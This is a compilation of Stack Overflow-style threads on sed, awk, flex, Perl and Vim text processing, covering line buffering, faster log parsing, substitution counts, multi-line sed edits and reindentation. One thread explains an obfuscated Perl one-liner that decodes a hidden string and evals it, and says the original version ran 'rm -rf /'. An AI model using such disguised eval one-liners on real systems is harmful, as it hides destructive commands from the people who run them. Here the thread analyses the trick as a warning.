Make sed not buffer by lines - perl

I'm not trying to prevent sed from block-buffering! I am looking to get it to not even line-buffer.
I am not sure if this is even possible at all.
Basically there is a big difference between the behavior of sed and that of cat when interacting with them from a raw pseudo-terminal: cat will immediately spit back the inserted characters when it receives them over STDIN, while sed even in raw mode will not.
A thought experiment could be carried out: given a simple sed command such as s/abc/zzz/g, sending a stream of input to sed like 123ab means that sed at best can provide over standard output the characters 123, because it does not yet know if a c will arrive and cause the result string to be 123zzz, while any other character would have it print exactly what came in (allowing it to "catch up", if you will). So in a way it's obvious why cat does respond immediately; it can afford to.
So of course that's how it would work in an ideal world where sed's authors actually cared about this kind of a use case.
I suspect that that is not the case. In reality, through my not too terribly exhaustive methods, I see that sed will line buffer no matter what (which allows it to always be able to figure out whether to print the 3 z's or not), unless you tell it that you care about matching your regexes past/over newlines, in which case it will just buffer the whole damn thing before providing any output.
My ideal solution is to find a sed that will spit out all the text that it has already finished parsing, without waiting till the end of line to do so. In my little example above, it would instantly spit back the characters 1, 2, and 3, and while a and b are being entered (typed), it says nothing, till either a c is seen (prints zzz), or any other character X is seen, in which case abX is printed, or in the case of EOF ab is printed.
Am I SOL? Should I just incrementally implement my Perl code with the features I want, or is there still some chance that this sort of magically delicious functionality can be got through some kind of configuration?
See another question of mine for more details on why I want this.
So, one potential workaround on this is to manually establish groups of input to "split" across calls to sed (or in my case since i'm already dealing with a Perl script, perl's regex replacement operators) so that I can sort of manually do the flushing. But this cannot achieve the same level of responsiveness because it would require me to think through the expression to describe the points at which the "buffering" is to occur, rather than having a regex parser automatically do it.

There is a tool that matches an input stream against multiple regular expressions in parallel and acts as soon as it decides on a match. It's not sed. It's lex. Or the GNU version, flex.
To make this demonstration work, I had to define a YY_INPUT macro, because flex was line-buffering input by default. Even with no buffering at the stdio level, and even in "interactive" mode, there is an assumption that you don't want to process less than a line at a time.
So this is probably not portable to other versions of lex.
%{
#include <stdio.h>
#define YY_INPUT(buf,result,max_size) \
{ \
int c = getchar(); \
result = (c == EOF) ? YY_NULL : (buf[0] = c, 1); \
}
%}
%%
abc fputs("zzz", stdout); fflush(stdout);
. fputs(yytext, stdout); fflush(stdout);
%%
int main(void)
{
setbuf(stdin, 0);
yylex();
}
Usage: put that program into a file called abczzz.l and run
flex --always-interactive -o abczzz.c abczzz.l
cc abczzz.c -ll -o abczzz
for ch in a b c 1 2 3 ; do echo -n $ch ; sleep 1 ; done | ./abczzz ; echo

You can actually write entire programs in sed.
Here is a way to slurp the whole file into the editing buffer. I added the -n to suppress printing and the $p so it would only print the buffer at the end, after i switch the hold space I have been building up with the current buffer I am editing.
sed -n 'H;$x;$p' FILENAME
You can conditionally build up the hold space based on patterns you encounter:
'/pattern/{H}'
You can conditionally print the buffer as well
'/pattern/{p}'
You can even nest these conditional blocks, if you feel saucy.
You could use a combination of `g' (to copy the hold space to the pattern space, thereby overwriting it) and then s/(.).*/\1/ and such to get at individual characters.
I hope this was at least informative. I would advise you to write a tool in a different language.

Related

Best scripting tool to profile a log file

I have extracted log files from servers based on my date and time requirement and after extraction it has hundreds of HTTP requests (URLs). Each request may or may not contain various parameters a,b,c,d,e,f,g etc.,
For example:
http:///abcd.com/blah/blah/blah%20a=10&b=20ORC
http:///abcd.com/blah/blah/blahsomeotherword%20a=30&b=40ORC%26D
http:///abcd.com/blah/blah/blahORsomeORANDworda=30%20b=40%20C%26D
http:///abcd.com/blah/blah/"blah"%20b=40ORCANDD%20G%20F
I wrote a shell script to profile this log file in a while loop, grep for different parameters a,b,c,d,e. If they contain respective parameter then what is the value for that parameter, or TRUE or FALSE.
while read line ; do
echo -n -e $line | sed 's/^.*XYZ:/ /;s/ms.*//' >> output.txt
echo -n -e "\t" >> output.txt
echo -n -e $line | sed 's/^.*XYZ:/ /;s/ABC.*//' >> output.txt
echo -n -e "\t" >> output.txt
echo -n -e $line | sed 's/^.*?q=/ /;s/AUTH_TYPE:.*//'>> output.txt
echo -n -e "\t" >> output.txt
echo " " >> output.txt
done < queries.csv
My question is, my cygwin is taking lot of time (an hour or so) to execute on a log file containing 70k-80k requests. Is there a best way to write this script so that it executes asap? I'm okay with perl too. But my concern is, the script is flexible enough to execute and extract parameters.
Like #reinerpost already pointed out, the loop-internal redirection is probably the #1 killer issue here. You might be able to reap significant gains already by switching from
while read line; do
something >>file
something else too >>file
done <input
to instead do a single redirection after done:
while read line; do
something
something else too
done <input >file
Notice how this also simplifies the loop body, and allows you to overwrite the file when you (re)start the script, instead of separately needing to clean out any old results. As also suggested by #reinerpost, not hard-coding the output file would also make your script more general; simply print to standard output, and let the invoker decide what to do with the results. So maybe just remove the redirections altogether.
(Incidentally, you should switch to read -r unless you specifically want the shell to interpret backslashes and other slightly weird legacy behavior.)
Additionally, collecting results and doing a single print at the end would probably be a lot more efficient than the repeated unbuffered echo -n -e writes. (And again, printf would probably be preferrable to echo for both portability and usability reasons.)
The current script could be reimplemented in sed quite easily. You collect portions of the input URL and write each segment to a separate field. This is easily done in sed with the following logic: Save the input to the hold space. Swap the hold space and the current pattern space, perform the substitution you want, append to the hold space, and swap back the input into the pattern space. Repeat as necessary.
Because your earlier script was somewhat more involved, I'm suggesting to use Awk instead. Here is a crude skeleton for doing things you seem to be wanting to do with your data.
awk '# Make output tab-delimited
BEGIN { OFS="\t" }
{ xyz_ms = $0; sub("^.*XYX:", " ", xyz_ms); sub("ms.*$", "", xyz_ms);
xyz_abc = $0; sub("^.*XYZ:", " ", xyz_abc); sub("ABC.*$", "", xyz_abc);
q = $0; sub("^.*?q=", " ", q); sub("AUTH_TYPE:.*$", "", q);
# ....
# Demonstration of how to count something
n = split($0, _, "&"); ampersand_count = n-1;
# ...
# Done: Now print
print xyz_mx, xyz_abc, q, " " }' queries.csv
Notice how we collect stuff in variables and print only at the end. This is less crucial here than it would have been in your earlier shell script, though.
The big savings here is avoiding to spawn a large number of subprocesses for each input line. Awk is also better optimized for doing this sort of processing quickly.
If Perl is more convenient for you, converting the entire script to Perl should produce similar benefits, and be somewhat more compatible with the sed-centric syntax you have already. Perl is bigger and sometimes slower than Awk, but in the grand scheme of things, not by much. If you really need to optimize, do both and measure.
Problems with your script:
The main problem: you append to a file in every statement. This means the file has to be opened and closed in every statement, which is extremely inefficient.
You hardcode the name of the output file in your script. This is a bad practice. Your script will be much more versatile if it just writes its output to stdout. Leave it to the call to specify where to direct the output. That will also get rid of the previous problem.
bash is interpreted and not optimized for text manipulation: it is bound to be slow, and complex text filtering won't be very readable. Using awk instead will probably make it more concise and more readable (once you know the language); however, if you don't know it yet, I advise learning Perl instead, which is good at what awk is good at but is also general-purpose language: it makes you much far more flexible, allows you to make it even more readable (those who complain about Perl being hard to read have never seen nontrivial shell scripts), and probably makes it a lot faster, because perl compiles scripts prior to running them. If you'd rather invest your efforts into a more popular language than Perl, try Python.

how many instances did a command affect?

Is there a way when using sed from the cli to return how many lines were affected, or better yet how many instances were affected by a command that might have multiple affects per line if the global param is used? Pretty much, for me, that would mean how many substitutions were made.
I guess one could output to a new file and then run a diff on the two files afterward, but my need to know how many instances a command affects is not that great to do that. I just wondered if there might be a feature native to sed that can be employed.
As far as I know, sed has no native feature to manipulate variables (e.g. to increase an internal counter). Definitely, that is one of the features brought by awk that were lacking in sed. So my advice would be that you switch to awk, and then you can easily use an awk script such as:
BEGIN { counter = 0 }
/mypattern/ { do-whatever-you-want; counter++ }
END { print counter }
You ask for a sed solution. Here is a pure sed approach that does some of what you want:
sed 's/old/new/;t change;b;:change w changes'
After executing this, the changed lines, if any, are written to the file changes.
How it works:
s/old/new/;
Replace this with whatever substitution you want to do.
t change;
This tells sed to jump to the label change if the preceding s command made any changes.
b;
If the preceding jump did not happen, then this b command is executed which ends the processing of this line.
:change w changes
This tells sed to write the current line, as changed by your s command, to the file changes.
The Next Step
The next step here would be to count the changes. To this end, sed can do arithmetic but it is not for the faint of heart.
OSX
As I recall, the version of sed on Mac OSX does not support chaining commands together with semicolons. Instead, try:
sed -e 's/old/new/' -e 't change' -e b -e ':change w changes'

sed recipe: how to do stuff between two patterns that can be either on one line or on two lines?

Let's say we want to do some substitutions only between some patterns, let them be <a> and </a> for clarity... (all right, all right, they're start and end!.. Jeez!)
So I know what to do if start and end always occur on the same line: just design a proper regex.
I also know what to do if they're guaranteed to be on different lines and I don't care about anything in the line containing end and I'm also OK with applying all the commands in the line containing start before start: just specify the address range as /start/,/end/.
This, however, doesn't sound very useful. What if I need to do a smarter job, for instance, introduce changes inside a {...} block?
One thing I can think of is breaking the input on { and } before processing and putting it back together afterwards:
sed 's/{\|}/\n/g' input | sed 'main stuff' | sed ':a $!{N;ba}; s/\n\(}\|{\)\n/\1/g'
Another option is the opposite:
cat input | tr '\n' '#' | sed 'whatever; s/#/\n/g'
Both of these are ugly, mainly because the operations are not confined within a single command. The second one is even worse because one has to use some character or substring as a "newline holder" assuming it isn't present in the original text.
So the question is: are there better ways or can the above-mentioned ones be optimized? This is quite a regular task from what I read in recent SO questions, so I'd like to choose the best practice once and for all.
P.S. I'm mostly interested in pure sed solutions: can the job be do with one invocation of sed and nothing else? Please no awk, Perl, etc.: this is more of a theoretical question, not a "need the job done asap" one.
This might work for you:
# create multiline test data
cat <<\! >/tmp/a
> this
> this { this needs
> changing to
> that } that
> that
> !
sed '/{/!b;:a;/}/!{$q;N;ba};h;s/[^{]*{//;s/}.*//;s/this\|that/\U&/g;x;G;s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/' /tmp/a
this
this { THIS needs
changing to
THAT } that
that
# convert multiline test data to a single line
tr '\n' ' ' </tmp/a >/tmp/b
sed '/{/!b;:a;/}/!{$q;N;ba};h;s/[^{]*{//;s/}.*//;s/this\|that/\U&/g;x;G;s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/' /tmp/b
this this { THIS needs changing to THAT } that that
Explanation:
Read the data into the pattern space (PS). /{/!b;:a;/}/!{$q;N;ba}
Copy the data into the hold space (HS). h
Strip non-data from front and back of string. s/[^{]*{//;s/}.*//
Convert data e.g. s/this\|that/\U&/g
Swap to HS and append converted data. x;G
Replace old data with converted data.s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/
EDIT:
A more complicated answer which I think caters for more than one block per line.
# slurp file into pattern space (PS)
:a
$! {
N
ba
}
# check for presence of \v if so quit with exit value 1
/\v/q1
# replace original newlines with \v's
y/\n/\v/
# append a newline to PS as a delimiter
G
# copy PS to hold space (HS)
h
# starting from right to left delete everything but blocks
:b
s/\(.*\)\({.*}\).*\n/\1\n\2/
tb
# delete any non-block details form the start of the file
s/.*\n//
# PS contains only block details
# do any block processing here e.g. uppercase this and that
s/th\(is\|at\)/\U&/g
# append ps to hs
H
# swap to HS
x
# replace each original block with its processed one from right to left
:c
s/\(.*\){.*}\(.*\)\n\n\(.*\)\({.*}\)/\1\n\n\4\2\3/
tc
# delete newlines
s/\n//g
# restore original newlines
y/\v/\n/
# done!
N.B. This uses GNU specific options but could be tweaked to work with generic sed's.

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

How to reformat a source file to go from 2 space indentations to 3?

This question is nearly identical to this question except that I have to go to three spaces (company coding guidelines) rather than four and the accepted solution will only double the matched pattern. Here was my first attempt:
:%s/^\(\s\s\)\+/\1 /gc
But this does not work because four spaces get replaced by three. So I think that what I need is some way to get the count of how many times the pattern matched "+" and use that number to create the other side of the substitution but I feel this functionality is probably not available in Vim's regex (Let me know if you think it might be possible).
I also tried doing the substitution manually by replacing the largest indents first and then the next smaller indent until I got it all converted but this was hard to keep track of the spaces:
:%s/^ \(\S\)/ \1/gc
I could send it through Perl as it seems like Perl might have the ability to do it with its Extended Patterns. But I could not get it to work with my version of Perl. Here was my attempt with trying to count a's:
:%!perl -pe 'm<(?{ $cnt = 0 })(a(?{ local $cnt = $cnt + 1; }))*aaaa(?{ $res = $cnt })>x; print $res'
My last resort will be to write a Perl script to do the conversion but I was hoping for a more general solution in Vim so that I could reuse the idea to solve other issues in the future.
Let vim do it for you?
:set sw=3<CR>
gg=G
The first command sets the shiftwidth option, which is how much you indent by. The second line says: go to the top of the file (gg), and reindent (=) until the end of the file (G).
Of course, this depends on vim having a good formatter for the language you're using. Something might get messed up if not.
Regexp way... Safer, but less understandable:
:%s#^\(\s\s\)\+#\=repeat(' ',strlen(submatch(0))*3/2)#g
(I had to do some experimentation.)
Two points:
If the replacement starts with \=, it is evaluated as an expression.
You can use many things instead of /, so / is available for division.
The perl version you asked for...
From the command line (edits in-place, no backup):
bash$ perl -pi -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
(in-place, original backed up to "YOUR_FILE.bak"):
bash$ perl -pi.bak -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
From vim while editing YOUR_FILE:
:%!perl -pe 's{^((?: )+)}{" " x (length($1)/2)}e'
The regex matches the beginning of the line, followed by (the captured set of) one or more "two space" groups. The substitution pattern is a perl expression (hence the 'e' modifier) which counts the number of "two space" groups that were captured and creates a string of that same number of "three space" groups. If an "extra" space was present in the original it is preserved after the substitution. So if you had three spaces before, you'll have four after, five before will turn into seven after, etc.